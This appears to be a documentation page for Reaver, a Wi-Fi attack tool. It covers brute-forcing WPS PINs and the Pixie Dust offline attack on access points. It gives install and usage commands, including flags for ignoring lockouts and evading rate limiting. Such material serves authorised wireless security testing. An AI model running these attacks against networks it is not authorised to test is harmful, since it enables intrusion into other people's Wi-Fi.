> ## Documentation Index
> Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt
> Use this file to discover all available pages before exploring further.

# Reaver

> WPS PIN brute force and Pixie Dust attack tool against WPS-enabled access points.

## Overview

Reaver attacks WPS by brute forcing the 8-digit PIN. The PIN is verified in two 4-digit halves, reducing the keyspace to \~11,000 combinations. Also supports Pixie Dust for offline PIN recovery on vulnerable chipsets.

***

## Install

```bash theme={"dark"}
sudo apt install reaver
```

***

## Usage

```
reaver -i <interface> -b <BSSID> [options]
```

| Flag                 | Description                                           |
| -------------------- | ----------------------------------------------------- |
| `-i <iface>`         | Monitor mode interface                                |
| `-b <BSSID>`         | Target AP MAC address                                 |
| `-c <channel>`       | Target channel                                        |
| `-K 1`               | Enable Pixie Dust attack                              |
| `-s <file>`          | Restore/resume a saved session (`--session`)          |
| `-S`                 | Use small DH keys (`--dh-small`) — not session resume |
| `-v` / `-vv`         | Verbose / extra verbose                               |
| `-d <sec>`           | Delay between PIN attempts                            |
| `--lock-delay <sec>` | Wait after lockout detected                           |
| `--fail-wait <sec>`  | Wait after consecutive failures                       |
| `-p <PIN>`           | Try specific PIN                                      |
| `-N`                 | Don't send NACK packets                               |
| `-L`                 | Ignore AP lockouts                                    |

***

## Pixie Dust Attack

```bash theme={"dark"}
sudo reaver -i wlan0mon -b <BSSID> -c <CHANNEL> -K 1 -vv
```

Exploits weak nonce generation. Recovers PIN offline in seconds on vulnerable chipsets.

***

## PIN Brute Force

```bash theme={"dark"}
sudo reaver -i wlan0mon -b <BSSID> -c <CHANNEL> -vv
```

***

## Resume Session

```bash theme={"dark"}
sudo reaver -i wlan0mon -b <BSSID> -c <CHANNEL> -vv -s /etc/reaver/<BSSID>.wpc
```

Session state saved in `/etc/reaver/<BSSID>.wpc`.

***

## Tune for Rate Limiting

```bash theme={"dark"}
sudo reaver -i wlan0mon -b <BSSID> -c <CHANNEL> -vv \
  --delay=5 \
  --lock-delay=300 \
  --fail-wait=360
```
